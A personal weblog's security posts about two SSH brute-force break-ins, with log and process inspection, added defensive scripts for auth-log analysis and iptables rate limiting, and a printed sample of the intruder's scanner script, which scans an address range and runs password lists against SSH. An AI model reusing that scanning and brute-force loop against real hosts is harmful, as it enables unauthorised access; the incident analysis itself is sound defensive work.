Parsed Participle

The personal weblog of Faiz Kazi: Mostly oddities in programming, life in Japan, occasionally music.

[ Home | RSS 2.0 | ATOM 1.0 ]

Sat, 25 Oct 2008

./ulib - offending IP is 79.116.242.2

Another break-in, this time by a brute-force SSH password-guess. A rarely used user account called neo was logged into from 79.116.242.2, and was running a process that showed up like:

neo  3995  0.0  0.0   1592   4 ?  S  Oct20   0:00 ./ulib

I wonder what it was actually doing. A cursory inspection of its open file descriptors showed nothing interesting:

# ls -l /proc/3995/fd/
total 3
lrwx------ 1 neo neo 64 Oct 25 07:43 0 -> /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 1 -> /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 2 -> /dev/pts/1 (deleted)

The login occurred 5 days ago:

44571:Oct 20 19:17:08 faizkazi sshd[2972]: Accepted keyboard-interactive/pam for neo from 79.116.242.2 port 3106 ssh2
44572:Oct 20 19:17:08 faizkazi sshd[2986]: (pam_unix) session opened for user neo by (uid=0)
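The sshd "Accepted ... for USER from IP" line above is the one record that ties the account to the source address, and the same log usually holds the run of "Failed password" lines that preceded it. The script below is an added example (not from the original post) that pulls both signals out of an auth log: failed attempts per source, every accepted login, and the accepted logins that are either for an account outside an allowlist or from a source that had already failed repeatedly. The log lines it runs on are constructed in the format quoted above; the allowlist, the failure threshold and the addresses are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: pick brute-force SSH logins out of
# an auth log. The log lines are constructed, modelled on the sshd format quoted
# in the post; the account allowlist and the failure threshold are assumptions.

# Write a constructed sample auth log to the file named in $1.
write_sample_log() {
    cat > "$1" <<'EOF'
Oct 20 19:16:40 faizkazi sshd[2950]: Failed password for root from 198.51.100.23 port 3080 ssh2
Oct 20 19:16:44 faizkazi sshd[2952]: Failed password for invalid user admin from 198.51.100.23 port 3083 ssh2
Oct 20 19:16:49 faizkazi sshd[2955]: Failed password for invalid user test from 198.51.100.23 port 3087 ssh2
Oct 20 19:16:53 faizkazi sshd[2960]: Failed password for neo from 198.51.100.23 port 3091 ssh2
Oct 20 19:16:58 faizkazi sshd[2964]: Failed password for neo from 198.51.100.23 port 3095 ssh2
Oct 20 19:17:02 faizkazi sshd[2968]: Failed password for neo from 198.51.100.23 port 3100 ssh2
Oct 20 19:17:08 faizkazi sshd[2972]: Accepted keyboard-interactive/pam for neo from 198.51.100.23 port 3106 ssh2
Oct 20 19:17:08 faizkazi sshd[2986]: (pam_unix) session opened for user neo by (uid=0)
Oct 21 09:02:13 faizkazi sshd[3301]: Accepted publickey for faiz from 203.0.113.7 port 51022 ssh2
Oct 21 09:30:00 faizkazi sshd[3310]: Failed password for faiz from 203.0.113.7 port 51040 ssh2
EOF
}

# Count "Failed password" events per source address, busiest first.
# "invalid user" lines shift the field positions, so locate "from" by name.
failed_attempts_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i + 1)]++; break }
        }
        END { for (ip in n) print n[ip], ip }' "$1" | sort -rn
}

# List every successful login as "user ip method".
accepted_logins() {
    awk '/sshd\[[0-9]+\]: Accepted / {
            user = ""; ip = ""; method = ""
            for (i = 1; i <= NF; i++) {
                if ($i == "Accepted") method = $(i + 1)
                if ($i == "for") user = $(i + 1)
                if ($i == "from") ip = $(i + 1)
            }
            print user, ip, method
        }' "$1"
}

# Flag accepted logins that (a) are for an account outside the allowlist, or
# (b) come from an address with at least $3 failed attempts in the same log.
# $1 = log file, $2 = space-separated allowlist, $3 = failure threshold.
flag_suspicious() {
    log=$1; allowed=" $2 "; threshold=${3:-5}
    accepted_logins "$log" | while read -r user ip _method; do
        fails=$(awk -v ip="$ip" '/Failed password for / {
                    for (i = 1; i <= NF; i++) if ($i == "from" && $(i + 1) == ip) c++
                } END { print c + 0 }' "$log")
        reason=""
        case "$allowed" in
            *" $user "*) ;;
            *) reason="account-not-allowlisted" ;;
        esac
        if [ "$fails" -ge "$threshold" ]; then
            reason="${reason:+$reason,}prior-failures=$fails"
        fi
        if [ -n "$reason" ]; then
            echo "$user $ip $reason"
        fi
    done
}

# Demo run against the constructed log.
demo_log=$(mktemp)
write_sample_log "$demo_log"
echo "== failed attempts per source =="; failed_attempts_by_ip "$demo_log"
echo "== accepted logins =="; accepted_logins "$demo_log"
echo "== suspicious (allowlist: faiz, threshold: 3) =="; flag_suspicious "$demo_log" "faiz" 3
rm -f "$demo_log"
```

On a real host the functions take the auth log directly (for example `flag_suspicious /var/log/auth.log "faiz" 10`); the allowlist is the set of accounts that are supposed to log in interactively, which is exactly what makes a login to a forgotten account like neo stand out even when it arrives with a valid password.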
posted: 07:59 | path: /security | permanent link to this entry


Mon, 19 Nov 2007

Sod off, loathsome script-kiddie

Someone (or should I say something, because this looks like some auto-scanning script) gained access via SSH using one of the unused user accounts on this server. Nothing very spectacular, especially since everything was easily visible with ps, and even who. The IP seems to be 86.123.17.188.

I could see this when I ran who:

faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)

Looks like it never got beyond that, though I saw some hundreds of './ssh' processes running; after summarily killing those off, I found and archived the offending scripts. These were stored in, and running out of, the directory /var/tmp/vi.recover/irc/ as the user 'vasanth'. I suspect a weak password led to a brute-force SSH break-in. Not at all a bother, but nothing that can't be fixed by an iptables '-m recent' filter.
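The '-m recent' filter mentioned above works by remembering the source address of each new connection to port 22 and dropping further connections from a source that exceeds a hit count inside a time window. The script below is an added example, not from the original post: it prints that rule pair for a chosen window and hit count, and it audits an iptables-save dump to tell whether such a rule is already in place. The two dumps it checks are constructed, and the 60-second window and hit count of 4 are assumed values, not ones from the post.

```shell
#!/bin/sh
# Added example, not from the original post: the iptables "-m recent" rate limit
# the post mentions, as a rule generator plus an audit of an iptables-save dump.
# The two dumps below are constructed; the 60-second window and hit count of 4
# are assumptions (common choices, not values from the post).

# Print the rule pair. $1 = window in seconds (default 60), $2 = hit count (default 4).
# The --set rule records every new connection from a source; the --update rule
# drops the connection once that source has reached the hit count inside the
# window, so with the defaults the fourth new connection within 60 s is dropped.
# Both rules must precede whatever rule ACCEPTs port 22, or they never see traffic.
ssh_ratelimit_rules() {
    seconds=${1:-60}; hits=${2:-4}
    printf '%s\n' \
        "iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -m recent --set --name SSH" \
        "iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW -m recent --update --seconds $seconds --hitcount $hits --name SSH -j DROP"
}

# Audit: succeed (exit 0) if the iptables-save dump in $1 already contains a
# rate-limit rule for port 22, i.e. a recent-match --update/--hitcount rule
# that DROPs or REJECTs.
has_ssh_ratelimit() {
    grep -E -- '--dport 22 .*-m recent .*--update .*--hitcount [0-9]+ .*-j (DROP|REJECT)' "$1" >/dev/null
}

# Constructed iptables-save excerpt: port 22 open with no brute-force protection.
write_unprotected_dump() {
    cat > "$1" <<'EOF'
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
EOF
}

# Constructed iptables-save excerpt: the same host after the rate limit is added
# (the recent rules sit before the ACCEPT for port 22).
write_protected_dump() {
    cat > "$1" <<'EOF'
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m conntrack --ctstate NEW -m recent --set --name SSH --mask 255.255.255.255 --rsource
-A INPUT -p tcp -m tcp --dport 22 -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 4 --name SSH --mask 255.255.255.255 --rsource -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
EOF
}

# Demo: show the rules, then audit both constructed dumps.
ssh_ratelimit_rules
for kind in unprotected protected; do
    dump=$(mktemp)
    "write_${kind}_dump" "$dump"
    if has_ssh_ratelimit "$dump"; then
        echo "$kind dump: SSH rate limit present"
    else
        echo "$kind dump: no SSH rate limit, add the rules printed above"
    fi
    rm -f "$dump"
done
```

To audit a live box, save the current ruleset with `iptables-save > /tmp/rules` and run `has_ssh_ratelimit /tmp/rules`. The rate limit only slows a guessing script down; the account that was actually abused here had a weak password and no legitimate use, so removing or locking unused accounts is the complementary fix.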

Contents of the directory the intruder was running the scripts from:
var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

Some samples from the scripts. Note: though no harm can come if you try running these binaries as a non-root user (if you are running Linux, that is), it's probably a good idea not to run the scripts in this archive - there's no easy way to be sure what they actually do.

$ cat /var/tmp/vi.recover/irc/go.sh 
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# � ALL RIGHTS RESERVED TO Regele �#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range   to -> $1.255.255"
echo "#Looking on -> PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq > mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 > pass_file
sleep 3
./ssh 150

cat 2 > pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"
Yup, script 'kiddie' all right.

posted: 11:55 | path: /security | permanent link to this entry

